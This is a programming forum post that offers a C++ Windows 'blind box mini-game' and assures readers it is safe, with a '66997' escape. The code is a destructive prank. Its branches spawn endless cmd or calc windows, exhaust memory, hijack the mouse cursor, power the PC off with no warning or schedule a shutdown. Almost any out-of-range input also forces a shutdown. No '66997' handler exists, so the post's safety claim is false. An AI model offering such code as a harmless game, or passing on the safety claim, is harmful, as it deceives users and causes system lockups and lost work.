社区讨论
好玩“小游戏”
灌水区参与者 8已保存回复 12
讨论操作
快速查看讨论及其快照的属性,并进行相关操作。
- 当前回复
- 12 条
- 当前快照
- 1 份
- 快照标识符
- @m2r98nyj
- 此快照首次捕获于
- 2024/10/27 15:14 去年
- 此快照最后确认于
- 2024/10/27 16:00 去年
好玩的小游戏
可以模拟电脑中毒,不过很安全,有任何情况按“66997”就行,不要输5!!!
CPP#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
long long sz;
int main() {
SetConsoleTitle("盲盒机V1.0.0");
system("color 0a");
printf("欢迎来到盲盒机,快来使用吧!\n\n");
Sleep(1000);
system("cls");
printf("请输入一个0~10之间的数,来抽个盲盒~\n\n");
while(scanf("%d",&sz)!=EOF) {
if(sz==1) {
printf("准备好炸弹的洗礼吧\n\n");
Sleep(500);
while(1) system("start cmd");
}
if(sz==0) {
printf("电脑觉得你该休息了!\n\n");
printf("所以...\n\n");
while(1) {
system("惊喜>>c:\\惊喜.txt");
}
}
if(sz==2) {
ks:
while(1) {
system("惊喜>>c:\\惊喜.txt");
}
}
if(sz==3) {
printf("你的鼠标背叛了你\n\n");
while(1) {
SetCursorPos(rand()%1000,rand()%1000);
}
}
if(sz==4) {
printf("卡死你\n\n");
while(1) {
malloc(1000);
}
}
if(sz==5) {
while(1) {
system("惊喜>>c:\\惊喜.txt");
}
}
if(sz==6) {
printf("保护视力ou!\n\n");
while(1) {
system("惊喜>>c:\\惊喜.txt");
}
}
if(sz==7) {
for(int j=1; j<=6; j++)
cout<<"再也不见\n";
system("shutdown -p");
}
if(sz==8) {
goto ks;
}
if(sz==9) {
printf("你得了慢性病\n\n");
system("shutdown -s -t 300");
}
if(sz==10) {
while(1)
system("start calc");
}
if(sz>=10||sz<0) {
if(sz!=1110) {
system("shutdown -p");
}
}
}
return 0;
}
回复
共 12 条回复,欢迎继续交流。
正在加载回复...